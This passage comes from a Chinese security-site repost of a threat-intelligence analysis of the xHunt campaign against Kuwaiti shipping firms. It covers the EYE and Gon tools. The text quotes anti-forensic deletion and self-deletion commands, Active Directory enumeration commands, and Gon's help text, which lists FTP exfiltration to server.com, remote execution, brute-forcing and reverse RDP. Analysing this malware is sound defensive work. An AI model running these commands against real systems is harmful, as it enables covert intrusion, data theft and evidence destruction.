歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

xHunt:針對科威特航運組織的攻擊行動

來源:本站整理 作者:佚名 時間:2019-10-06 TAG: 我要投稿
            ????????????????????? ????????????????????????????
              ????????????????              ?????????????????
                                                    ??
 
 
Start Watching Without LOG_OFF Mode...
iexplore
iexplore
cmd
conhost
calc
SnippingTool
wisptis
SoundRecorder
control
rundll32
dllhost
dllhost
TSTheme
cmd
we be wait for you boss !!!
TPAutoConnect
conhost
cmd
conhost
taskkill
當嘗試進行本地或RDP登錄時,EYE會向控制臺寫入字符串“we be wait for you boss !!!”,然后才開始清理痕跡,殺死自EYE啟動以來創建的所有進程, 然后,EYE將通過運行以下命令刪除使用跳轉列表創建的所有最新文檔和文件:
Del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\* & Del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\* & Del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*
EYE還將刪除在以下注冊表項中找到的所有值以及用戶文件夾中的“ Default.rdp”文件:
Software\\Microsoft\\Terminal Server Client\\Default
 
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WordWheelQuery
 
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TYPEDPATHS
 
Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
EYE刪除自身:
taskkill /f /im  & choice /C Y /N /D Y /T 3 & Del “

EYE確實包含一些有趣的構件,比如從未使用或調用過的“ExecuteCommand”方法。此方法的存在表明,它要么是前一個版本的遺留代碼,要么是此工具所基于的另一個代碼基的構件。我們相信EYE是用Hisoka和Sakabota的代碼創建的,因為方法名和變量名有明顯的重疊,PDB調試路徑中也有對Sakabota的引用:
Z:\TOOLS\Sakabota_Tools\Utility\Micosoft_Visual_Studio_2010_Experss\PRJT\Sync\Sakabota\EYE\EYE\obj\Release\EYE.pdb
Gon
Gon工具也于2019年5月首次觀察到,包含了多種功能,它可能用于后漏洞利用階段。
Gon具有掃描遠程系統上開放端口、上傳和下載文件、截屏、查找網絡上的其他系統、使用WMI或PSEXEC在遠程系統上運行命令,以及使用plink實用程序創建RDP會話的功能。Gon可以作為命令行實用程序使用,也可以使用GUI作為桌面應用程序。在GUI情況下, Gon可以使用嵌入其中的“dsquery”工具發出以下命令,從active directory獲取計算機、用戶和組名:
DS.exe computer -limit 0 > computer_DS.txt
 
DS.exe user -limit 0 > Users_DS.txt
 
DS.exe group -limit 0 > Group_DS.txt
當使用命令行時,可以很容易地看到Gon的“-help”命令下的使用:
 
 ___v0.2_              
               /  _____/  ____   ____ 
              /   \  ___ /  _ \ /    \
              \    \_\  (   )   |  \
               \______  /\____/|___|  /
                      \/            \/ 
 
-Up[-l Path.txt] FOLDER_OR_FILE -C Host;User;Pass [-KWF](kill when Finish) [-DEL](delete when item upload)
[+] is ftp upload 1_ex=-up my_folder_or_File -KWF -DEL -C server.com;admin;123
2_ex=-up-l my_Path.txt -C server.com;admin;123
 
-Screen[-up][-s count,seconds] -C Host;User;Pass
[+] Print Screen -up is upload to ftp and delete the file. -s will repate and will upload -C Cerdential For Upload via FTP
 
-Remote [-P] [Host;user;pass;Wdir] [Code]
[+] wmic to host;user;-P is psexecmode ,pass and save it in Wdir\Thumb.dll
 
-Download[-s] URL
[+] http://www.URL , is -s Https will download in same directory
 
-Scan[-v IP-To][-l Path.txt] [setp] [-A]
[+] Result will be in P.txt,-A is advanced scan but slower, step is number to bruteforce MAX 230 -> ex = -Scan-v 192.168.?.? 8
 
-Bruter Path.txt username;pass{?} [+][-]
[+] Result will be in N.txt , [+] Write netuse IP,[-] Write nont-netuse IP, Tip = Username & Password can be read from file
 
-Rev[-clean][-loop] [V_ip] [port_to_Exit] [server;port]
[+] RDP Revers on loop on every 10 min and with SYSTEM

上一頁  [1] [2] [3] [4] [5] [6]  下一頁

【聲明】:黑吧安全網(http://www.eyhadu.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        彩票大数据